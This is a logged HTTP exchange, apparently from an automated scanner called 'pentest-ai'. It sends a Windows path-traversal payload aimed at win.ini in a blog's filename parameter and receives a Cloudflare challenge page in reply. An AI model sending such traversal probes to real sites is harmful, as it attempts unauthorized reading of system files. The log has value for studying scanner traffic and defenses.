REQUEST:
GET https://my.myfirst.tech/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/files?filename=..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:31:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9712
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c83b41a997a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=zzuwb3QXzhTigRTBMN2gQQjlXnBIa7WL6gGhuefcbBqQuut8SkHNRYYjYpnK3ibY%2FLpeEtIJgYBUrfJMfgxODKMT94ZnvYzOVf%2B%2B1QBFILRnpo2lMCVn2D4UhxH%2Bl8uRaA%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c83b41a997a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'aqcTWnXQ8G0Hnbk9Z_5DfcHTYFODOkes67quVa2S5m0-1784280663-1.2.1.1-Wqlks152AKXL0wqnk2cJduQPgtPZL.c_4dlyG4b6EMZFTImnpf3rvOatTp3ol4iQ',cITimeS: '1784280663',cRay: 'a1c83b41a997a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/files?filename=..%5C..%5C..%5C..%5Cwindows%5Cwin.ini\u0026__cf_chl_tk=ENVovuZfMwwfiH9BIG0ie3RqOgArn89Ba7d5Cdtl8Z4-1784280663-1.0.1.1-wjIbjUu9P0G_9KQf5.Z9qEyO_5.A.5hMJiaFI3QxVuw",cvId: '3',cZone: 'my.myfirst.tech',fa:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/files?filename=..%5C..%5C..%5C..%5Cwindows%5Cwin.ini\u0026__cf_chl_f_tk=ENVovuZfMwwfiH9BIG0ie3RqOgArn89Ba7d5Cdtl8Z4-1784280663-1.0.1.1-wjIbjUu9P0G_9KQf5.Z9qEyO_5.A.5hMJiaFI3QxVuw",md: 'FgoeFh.zgJtU0KHQcDaxHJNYFBms0YFPYcOGIFwK_28-1784280663-1.2.1.1-Cg69pKTHqu9fQNMb3g6tChOPzTXqLjqVfqdap3cGoBJqt1bJKtSzgDSYo4dvt3eQkbxjJ7S6TpKHVbnr1JHTReJJ0hlyVN.OJC6m1DUVRSUE5dSuh5b.wmqV.61xjrYbc3L6L4.WgzC1YsNztUPYvRKTfwTGtHwSD4iI7rg5gfiBQHN9qJdLkz4BLliK.pFnw.Fv14Xc8_tdb7wUxAgOZbmIT96viIxdymy3y.2c4sRXHcdrTgxm6yBJ2r5EtUGdPTGzk0LQbzwhDa20wMqqqIntdxl.ZYxnshbUA_m5_ZOED2MA36iyuxVKC1zxX.V4RPAMywmQr2bB4x2yJ9ZKle6sxSJMMlkijqda3yh1PILn4ZZt.U6.KoEo1iP.k1fSIFI3fYyFEzLeMYWLLZ1r2ICGQYJ7y1dbGNYPqcyC2Q_T8Qk63flhMD.DAKCoyQ97bWeUPvl1yj6mjj89SuiMSyWy7ggw.A8NvIxzCwFvD7z48AU0cZ6Hk8lxOPIkX66shzvLiI4_ITZg.l2wShNnDjEZZSegcEhjoipoFH4WAw26u4TPRdYvz1W2eAJNYtp8IpNAsyHFV03F4jYTj1aYgOJf2Z8vveCYS3QN0EH2bWEtofte3ekAMA80OzhnrZqsce5Zbu9lFy1lV3CTfkkqgCGcGxqwgBrqUPcQb5mW0w_yojKfCE.zVPbRZs7Sevvn_os.vAvDgarl519pKVT_snDTqDbRKP5qivWda8qvsWlVgTrK36SW.OlGI12sb2UClK_S1iFsQMV_tEQO.HfjnEyY1lF8mgTdQbi4aAECl.LXpAe4mq3bLfTLiutsYW_CuvPJ4uOxdScXhF.JhLLfblJd6EZK7Qa1RKrfYZ1YbTwkWlgr7kx8QDZ0S5W4poozrTu_wC_xEr9xY2wgcgdoY_AlhFWmN.GXAXhedtK6FIiluFsZrHrY7m1wwpRYgkWhnMfd9ApqK0wh7ObYQPeShqdYFPm7n85qgftUkXlvGx3BosC6hsCGD.sYwYIk.XjHib0Ol8xrITSw5lAnekrkK1LbY2w9EJZN0DMTPhrIgikAmUW6NqeVcRoAT7IZABTDWQYSfynAtBifSZ.Y2SR4ZSUG127G_f6e32BPGq.rSHQOnwXTnAUXSF1mVFwrGuNeZwBhcNo_HIW739czzDJTqxZjnqf39H2XTEtFz.n2fFoU3_IZGTS.WK3WgSadfVx3yhU9RJbNxhW9J9B4PC.kMHXd1dZyW32eHRRAD4T8krmK3VrEWJbULlCqCUQ9zS8BQUY3H8i3MTaqFpf_80kn3xOy47L2dvozLr5F5_Ws5xg',mdrd: '08fnFUjk3PifUiUxJvJAkj2dV1KR_YxCoGpKbGKtb7c-1784280663-1.2.1.1-0JPV8CIENp5P.ElRxmgTf6sxMO1ifsCF4FYIERNBZcHX9dSmhKWI3NKlqiZLePsopXrOrmUWfqNQvt3GRqE03ND9lNF9rohfoxBomkbY0zwjgy5L5hNv2uh4p4hn7DyHwm6ymr1lG1eLXGi8_nTEmPvrY7WSlNyhF9ImFicnB3dOiMp7rtIb1watt1HmExsX7hUILm7IvNlfvywFJDpx22SnhPwMfxV8v42Hv62RKeD.hR_nRgJSWWe1of4nleis',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c83b41a997a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/files?filename=..%5C..%5C..%5C..%5Cwindows%5Cwin.ini\u0026__cf_chl_rt_tk=ENVovuZfMwwfiH9BIG0ie3RqOgArn89Ba7d5Cdtl8Z4-1784280663-1.0.1.1-wjIbjUu9P0G_9KQf5.Z9qEyO_5.A.5hMJiaFI3QxVuw"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
